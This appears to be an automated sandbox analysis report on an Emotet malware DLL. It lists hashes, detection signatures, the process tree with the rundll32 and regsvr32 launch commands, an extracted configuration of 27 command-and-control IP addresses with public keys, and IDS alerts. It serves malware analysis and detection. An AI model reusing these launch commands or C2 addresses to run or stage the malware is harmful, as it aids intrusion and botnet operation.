Play interactive tour

Edit tour

Windows Analysis Report EcJ8rbg.dll

Overview

General Information

Sample Name:	EcJ8rbg.dll
Analysis ID:	553239
MD5:	8d7dd249f2a87f71b1588ce7d9855c80
SHA1:	a0776075300b15a404955bf669674d88df3a84ae
SHA256:	52faccb896886829a34782bd88a943f4e9a883ca5126aa147bbc177b9aaf8273
Tags:	dll
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Machine Learning detection for sample

Sigma detected: Suspicious Call by Ordinal

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

PE file contains strange resources

Tries to load missing DLLs

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Connects to several IPs in different countries

Potential key logger detected (key state polling based)

Registers a DLL

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 3436 cmdline: loaddll32.exe "C:\Users\user\Desktop\EcJ8rbg.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 5792 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\EcJ8rbg.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 5104 cmdline: rundll32.exe "C:\Users\user\Desktop\EcJ8rbg.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6728 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\EcJ8rbg.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

regsvr32.exe (PID: 5608 cmdline: regsvr32.exe /s C:\Users\user\Desktop\EcJ8rbg.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

rundll32.exe (PID: 6700 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\EcJ8rbg.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6676 cmdline: rundll32.exe C:\Users\user\Desktop\EcJ8rbg.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 2912 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Twpdaikokj\mcaqvcjuoohw.tdj",GacrURwyZJOcX MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 1320 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Twpdaikokj\mcaqvcjuoohw.tdj",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

svchost.exe (PID: 6268 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 7136 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5328 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6636 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["45.138.98.34:80", "69.16.218.101:8080", "51.210.242.234:8080", "185.148.168.220:8080", "142.4.219.173:8080", "54.38.242.185:443", "191.252.103.16:80", "104.131.62.48:8080", "62.171.178.147:8080", "217.182.143.207:443", "168.197.250.14:80", "37.44.244.177:8080", "66.42.57.149:443", "210.57.209.142:8080", "159.69.237.188:443", "116.124.128.206:8080", "128.199.192.135:8080", "195.154.146.35:443", "185.148.168.15:8080", "195.77.239.39:8080", "207.148.81.119:8080", "85.214.67.203:8080", "190.90.233.66:443", "78.46.73.125:443", "78.47.204.80:443", "37.59.209.141:8080", "54.37.228.122:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.651219135.0000000003250000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.658773887.00000000052D1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000009.00000002.663246683.0000000002F90000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000007.00000002.658783740.0000000004A51000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.658642834.00000000050E0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.658723299.0000000005171000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000007.00000002.657974448.00000000008B0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.655430157.0000000002940000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000007.00000002.658619486.0000000004860000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000007.00000002.658016233.00000000008E1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.658517019.0000000004E81000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000007.00000002.658811817.0000000004B80000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.658095730.0000000002E20000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000007.00000002.658757089.0000000004A20000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.655623941.0000000004241000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.658582876.0000000004FB1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000007.00000002.658656384.0000000004891000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.658747642.00000000052A0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.658668655.0000000005111000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000007.00000002.658839063.0000000004BB1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000007.00000002.658706042.00000000049C0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.658328602.00000000048D1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000007.00000002.658574169.0000000004761000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000009.00000002.663415496.00000000049F1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000007.00000002.658548495.0000000004730000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.658494027.0000000004E50000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000007.00000002.658732893.00000000049F1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.658556614.0000000004F80000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.658697305.0000000005140000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author
5.2.rundll32.exe.48d0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.4e50000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.5140000.8.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.49c0000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.2e20000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.regsvr32.exe.3250000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.4240000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.5140000.8.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.rundll32.exe.49f0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.4a20000.8.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.5110000.7.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.52a0000.10.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.49f0000.7.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.4760000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.2940000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.5170000.9.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.4a50000.9.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.50e0000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.4a20000.8.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.regsvr32.exe.3250000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.49c0000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.4b80000.10.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.8b0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.regsvr32.exe.4b30000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.50e0000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.4b80000.10.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.8b0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.4730000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.rundll32.exe.2f90000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.4860000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.4860000.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.4730000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.4f80000.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.4f80000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.4890000.5.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.52a0000.10.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.2940000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.8e0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.4bb0000.11.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.rundll32.exe.2f90000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.4fb0000.5.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.4e50000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.4e80000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.52d0000.11.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.2e20000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 40 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal

Show sources

Source: Process started

Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\EcJ8rbg.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\EcJ8rbg.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\EcJ8rbg.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5792, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\EcJ8rbg.dll",#1, ProcessId: 5104

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 7.2.rundll32.exe.4760000.3.unpack

Malware Configuration Extractor: Emotet {"C2 list": ["45.138.98.34:80", "69.16.218.101:8080", "51.210.242.234:8080", "185.148.168.220:8080", "142.4.219.173:8080", "54.38.242.185:443", "191.252.103.16:80", "104.131.62.48:8080", "62.171.178.147:8080", "217.182.143.207:443", "168.197.250.14:80", "37.44.244.177:8080", "66.42.57.149:443", "210.57.209.142:8080", "159.69.237.188:443", "116.124.128.206:8080", "128.199.192.135:8080", "195.154.146.35:443", "185.148.168.15:8080", "195.77.239.39:8080", "207.148.81.119:8080", "85.214.67.203:8080", "190.90.233.66:443", "78.46.73.125:443", "78.47.204.80:443", "37.59.209.141:8080", "54.37.228.122:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}

Multi AV Scanner detection for submitted file

Show sources

Source: EcJ8rbg.dll

Virustotal: Detection: 40%

Perma Link

Machine Learning detection for sample

Show sources

Source: EcJ8rbg.dll

Joe Sandbox ML: detected

Source: EcJ8rbg.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.2.4:49781 -> 45.138.98.34:80
Source: Traffic	Snort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.4:49782 -> 69.16.218.101:8080

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 69.16.218.101 144			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 45.138.98.34 80			Jump to behavior

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 45.138.98.34:80
Source: Malware configuration extractor	IPs: 69.16.218.101:8080
Source: Malware configuration extractor	IPs: 51.210.242.234:8080
Source: Malware configuration extractor	IPs: 185.148.168.220:8080
Source: Malware configuration extractor	IPs: 142.4.219.173:8080
Source: Malware configuration extractor	IPs: 54.38.242.185:443
Source: Malware configuration extractor	IPs: 191.252.103.16:80
Source: Malware configuration extractor	IPs: 104.131.62.48:8080
Source: Malware configuration extractor	IPs: 62.171.178.147:8080
Source: Malware configuration extractor	IPs: 217.182.143.207:443
Source: Malware configuration extractor	IPs: 168.197.250.14:80
Source: Malware configuration extractor	IPs: 37.44.244.177:8080
Source: Malware configuration extractor	IPs: 66.42.57.149:443
Source: Malware configuration extractor	IPs: 210.57.209.142:8080
Source: Malware configuration extractor	IPs: 159.69.237.188:443
Source: Malware configuration extractor	IPs: 116.124.128.206:8080
Source: Malware configuration extractor	IPs: 128.199.192.135:8080
Source: Malware configuration extractor	IPs: 195.154.146.35:443
Source: Malware configuration extractor	IPs: 185.148.168.15:8080
Source: Malware configuration extractor	IPs: 195.77.239.39:8080
Source: Malware configuration extractor	IPs: 207.148.81.119:8080
Source: Malware configuration extractor	IPs: 85.214.67.203:8080
Source: Malware configuration extractor	IPs: 190.90.233.66:443
Source: Malware configuration extractor	IPs: 78.46.73.125:443
Source: Malware configuration extractor	IPs: 78.47.204.80:443
Source: Malware configuration extractor	IPs: 37.59.209.141:8080
Source: Malware configuration extractor	IPs: 54.37.228.122:443

Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS

Source: Joe Sandbox View	IP Address: 207.148.81.119 207.148.81.119
Source: Joe Sandbox View	IP Address: 104.131.62.48 104.131.62.48

Source: global traffic

TCP traffic: 192.168.2.4:49782 -> 69.16.218.101:8080

Source: unknown

Network traffic detected: IP country count 11

Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.98.34
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.98.34
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.98.34
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101

Source: svchost.exe, 00000011.00000003.767138150.00000289AE99D000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z\|\|.\|\|d5cdcec3-04df-404e-ba07-3240047c89f9\|\|1152921505694348672\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
Source: svchost.exe, 00000011.00000003.767138150.00000289AE99D000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z\|\|.\|\|d5cdcec3-04df-404e-ba07-3240047c89f9\|\|1152921505694348672\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab

Source: svchost.exe, 00000011.00000003.761015443.00000289AE90C000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.782664257.00000289AE900000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 77EC63BDA74BD0D0E0426DC8F80085060.10.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: svchost.exe, 00000011.00000003.761511739.00000289AE991000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.761615718.00000289AE9B1000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.761553202.00000289AE97F000.00000004.00000001.sdmp	String found in binary or memory: http://help.disneyplus.com.
Source: svchost.exe, 00000011.00000003.761511739.00000289AE991000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.761615718.00000289AE9B1000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.761553202.00000289AE97F000.00000004.00000001.sdmp	String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 00000011.00000003.761511739.00000289AE991000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.761615718.00000289AE9B1000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.761553202.00000289AE97F000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 00000011.00000003.761511739.00000289AE991000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.761615718.00000289AE9B1000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.761553202.00000289AE97F000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 00000011.00000003.762429970.00000289AE978000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.762444639.00000289AE989000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.762645244.00000289AE99A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.762542665.00000289AE9D2000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.762524654.00000289AE9D2000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.762611865.00000289AE978000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.762579318.00000289AE9BB000.00000004.00000001.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_100012D0 recvfrom,

2_2_100012D0

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1000FF59 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,		2_2_1000FF59
